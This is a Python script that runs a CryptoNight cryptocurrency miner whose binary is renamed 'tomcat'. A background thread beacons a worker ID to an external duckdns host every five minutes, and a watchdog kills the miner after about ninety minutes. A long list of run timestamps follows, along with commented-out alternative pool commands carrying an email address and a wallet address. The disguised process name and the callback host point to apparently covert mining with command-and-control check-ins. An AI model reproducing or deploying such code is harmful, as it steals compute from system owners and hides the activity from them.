import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:22:01.458544
#2018-02-17 17:10:04.243952
#2018-02-17 18:57:06.972338
#2018-02-17 20:46:06.342691
#2018-02-17 22:33:06.098791
#2018-02-18 00:17:03.974923
#2018-02-18 02:08:04.534783
#2018-02-18 03:55:04.777807
#2018-02-18 05:41:06.974875
#2018-02-18 07:33:01.663971
#2018-02-18 09:21:01.618965
#2018-02-18 11:06:07.145128
#2018-02-18 12:53:05.969100
#2018-02-18 14:41:04.812551
#2018-02-18 16:30:01.487234
#2018-02-18 18:19:01.360638
#2018-02-18 20:05:02.903944
#2018-02-18 21:52:04.101806
#2018-02-18 23:41:05.573427
#2018-02-19 01:27:01.460695
#2018-02-19 03:16:01.311994
#2018-02-19 05:00:09.607494
#2018-02-19 06:46:08.549613
#2018-02-19 08:35:04.463828
#2018-02-19 10:24:02.106281
#2018-02-19 12:12:08.693226
#2018-02-19 13:59:02.181194
#2018-02-19 15:48:05.428343
#2018-02-19 17:35:05.570820
#2018-02-19 19:24:05.957508
#2018-02-19 21:12:05.709137
#2018-02-19 22:58:06.925641
#2018-02-20 00:43:04.719465
#2018-02-20 02:33:05.138386
#2018-02-20 04:21:04.565785
#2018-02-20 06:04:07.723339
#2018-02-20 07:49:03.532009
#2018-02-20 09:34:04.317286
#2018-02-20 11:18:06.880001
#2018-02-20 13:05:10.789739
#2018-02-20 14:50:08.701477
#2018-02-20 16:36:06.288229
#2018-02-20 18:23:01.644494
#2018-02-20 20:16:01.505761
#2018-02-20 22:01:08.188047
#2018-02-20 23:42:04.471690
#2018-02-21 01:26:04.276109
#2018-02-21 03:13:06.503512
#2018-02-21 05:00:10.301779
#2018-02-21 06:48:07.225557
#2018-02-21 08:35:10.330362
#2018-02-21 10:21:07.734951
#2018-02-21 12:09:04.071885
#2018-02-21 13:57:06.878554
#2018-02-21 15:42:01.534806
#2018-02-21 18:32:04.728495
#2018-02-21 20:16:08.972326
#2018-02-21 22:04:06.110641
#2018-02-21 23:50:08.351500
#2018-02-22 01:42:06.651949
#2018-02-22 03:30:08.362772
#2018-02-22 05:17:01.875065
#2018-02-22 07:01:02.072531
#2018-02-22 08:47:06.177895
#2018-02-22 10:34:08.879066
#2018-02-22 12:21:05.233840
#2018-02-22 14:06:08.070443
#2018-02-22 15:53:01.970935
#2018-02-22 17:40:07.308352
#2018-02-22 19:27:05.103464
#2018-02-22 21:18:07.864728
#2018-02-22 23:04:04.352192
#2018-02-23 00:50:09.881986
#2018-02-23 02:39:05.839440
#2018-02-23 04:26:06.978332
#2018-02-23 06:12:03.606515
#2018-02-23 07:58:01.240392
#2018-02-23 10:14:06.246275
#2018-02-23 12:08:01.776735
#2018-02-23 13:56:11.898348
#2018-02-23 15:48:01.789821
#2018-02-23 17:34:09.493898
#2018-02-23 19:21:01.615579
#2018-02-23 21:04:01.534240
#2018-02-23 22:48:08.244032
#2018-02-24 00:37:07.034994
#2018-02-24 02:27:03.663224
#2018-02-24 04:18:06.949277
#2018-02-24 06:05:08.258329
#2018-02-24 07:52:07.015430
#2018-02-24 09:37:05.437416
#2018-02-24 11:32:04.205883
#2018-02-24 13:22:04.994984
#2018-02-24 15:11:05.410136
#2018-02-24 16:59:07.259552
#2018-02-24 18:47:06.191104
#2018-02-24 20:38:07.744021
#2018-02-24 22:44:05.179407
#2018-02-25 03:03:03.817950
#2018-02-25 06:51:04.024247